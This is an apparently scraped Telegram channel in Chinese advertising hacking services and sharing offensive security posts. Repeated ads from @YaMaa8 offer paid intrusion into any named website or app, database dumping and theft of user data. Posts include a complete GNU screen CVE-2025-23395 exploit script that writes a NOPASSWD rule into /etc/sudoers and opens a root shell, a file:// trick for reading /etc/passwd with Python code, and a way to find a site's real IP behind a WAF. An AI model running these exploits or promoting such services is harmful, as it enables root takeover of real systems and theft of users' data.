网站破解权限 渗透劫持 黑客数据
5.03K subscribers
570 photos
1 video
51 links
Download Telegram
很明显有两个关键点:第一个是REST Plugin,另一个是Dynamic Method Invocation is enabled.(也就是开启动态方法执行),看到这里需要满足两个条件,感觉有点鸡肋啊……

直接下载回来源代码调试,载入官方的演示包struts2-rest-showcase.war,我们先随便访问一个连接/struts2-rest-showcase/orders/1,很快定位到关键代码我们看到methodName直接进入到了ognlUtil.getValue方法,对struts2历史漏洞有点熟悉的同学都知道,这个就是最终导致代码执行的地方。不多说,直接上POC:但是如果真的只是这样这个漏洞真的是比较鸡肋的,因为动态方法在这里默认是不开启的,那我们接着分析,有没有可能不用开动态方法都可以执行任意代码了,答案是肯定的。这个地方能不能代码执行主要是这个地方的限制
This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP

脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、


(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)


(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、


业务合作: @YaMaa8
This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP

脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、


(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)


(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、


业务合作: @YaMaa8
Telegram必备的搜索引擎,极搜JISOU帮你精准找到,想要的群组、频道、视频、音乐

👉 t.me/jisou2?start=a_7192011273
📝STP协议的工作原理

➡️STP(生成树协议)是以太网的主要协议之一,它可以避免网络中的环路问题,确保网络的可靠性和稳定性。该协议在OSI网络模型的数据链路层运行,能够自动检测并阻止交换机之间不必要的连接。
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP

脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、


(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)


(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、


业务合作: @YaMaa8
关于这个问题有很多答案,但我将重点介绍在日常生活中最常用的几种:

⬜️ 应用程序:
通过应用程序,我们可以在设备之间传输各种数据,并访问共享资源。

⬜️ 网络资源:
例如,办公室使用的网络打印机,或者安保人员在远程位置监控的网络摄像头。

⬜️ 存储:
通过连接到网络的服务器或工作站,可以创建可供他人访问的存储空间。许多人会将自己的文件、视频、图片上传到那里,并允许其他用户访问这些内容。

⬜️ 备份:
在大型公司中,通常会使用中央服务器,所有计算机都会将重要文件复制到那里进行备份。

⬜️ VoIP:
基于IP协议的电话服务。目前,VoIP已被广泛应用,因为它比传统电话更简单、更便宜,并且每年都在逐渐取代传统电话。

#网络 |
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP

脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、


(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)


(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、


业务合作: @YaMaa8
去参加了Standoff 最佳 25 位研究人员的闭门表彰活动。

非常棒的场地和活动,感谢 организаторам!

业务合作: @YaMaa8
file://localhost/etc/passwd
会返回什么?

是的,会返回/etc/passwd

RFC 8089 中,正确的格式 被描述为 file://<host>/<path>,而 LFR 上的所有漏洞利用都只提到了 file:///<path>

而且,在 <host> 中可以输入 域名。系统会解析它,如果指向 127.0.0.1,则会返回文件内容。否则,你只会得到 DNS 的响应。

Python 继续

from urllib.request import urlopen

content = urlopen(
"file://yoogle.com/etc/passwd", timeout=2,
).read().decode('utf-8')

print(content)




业务合作: @YaMaa8
🚨 发现 4 个高危 远程代码执行 (RCE) 漏洞,存在于由第三方开发者“Sotbit”开发的 Bitrix CMS 模块 中。

再次出现不安全的序列化问题。这些插件漏洞与输入数据验证不足有关。利用这些漏洞可能允许攻击者远程执行任意代码。已存在利用代码,并且正在被积极使用。开发者建议升级到最新版本,或应用 补丁。

受影响的插件列表:
⚫️ Sotbit: Origami (已下线,版本 14.1.0 及更早版本)
⚫️ Sotbit: 增强型评论 (版本 1.4.1 及更早版本)
⚫️ Sotbit: 快速在可视化编辑器中上传图片
⚫️ Sotbit: 多区域支持
⚫️ Sotbit: 内容解析器

严重程度:8.8/10 (CVSS 3.0)


业务合作: @YaMaa8
Please open Telegram to view this post
VIEW IN TELEGRAM
GNU screen 漏洞,允许以 root 权限执行代码 (CVE-2025-23395)

该漏洞源于以下原因:当以 root 权限启动时,`logfile_reopen()` 函数在权限降级之前执行,但它处理的数据是在当前非特权用户的上下文中,该用户启动了 screen。值得注意的是,初始日志文件的打开操作会正确地进行权限降级,但当再次打开日志文件时,权限降级操作不会执行。

利用方法:
#!/bin/sh
# screen CVE-2025-23395 漏洞利用
# blablabla
# blasty
F=$(mktemp)
L=$HOME/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] 启动 GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] 日志文件已出现,开始利用"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ]; then
echo "[+] 成功,我们搞定了"
sudo sh
else
echo "[-] 漏洞利用失败 :("
fi
rm -rf $F $L



业务合作: @YaMaa8
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2025-22828

在 Apache CloudStack 4.16.0 及更高版本中,发现了一个访问控制漏洞,该漏洞允许了解资源 UUID 的用户读取或添加评论(标注)到他们没有访问权限的资源上。

业务合作: @YaMaa8
有时,在渗透测试过程中,需要确定网站的真实IP地址,而这个地址可能被Web应用防火墙(WAF)或其他安全机制隐藏。

一个经常被忽略的技巧是,简单地获取一封邮件。

当然,首先需要找到发送邮件的功能。这可能是注册确认、密码重置通知、订阅广告邮件等等,并不重要。最重要的是收到一封邮件。

收到邮件后,点击“显示原始邮件”,然后就可以查看发件人的IP地址。

业务合作: @YaMaa8
CVE-2024-33113:D-LINK DIR-845L 信息泄露漏洞

D-LINK DIR-845L 设备存在通过 bsc_sms_inbox.php 文件泄露信息的漏洞。

利用方法


业务合作: @YaMaa8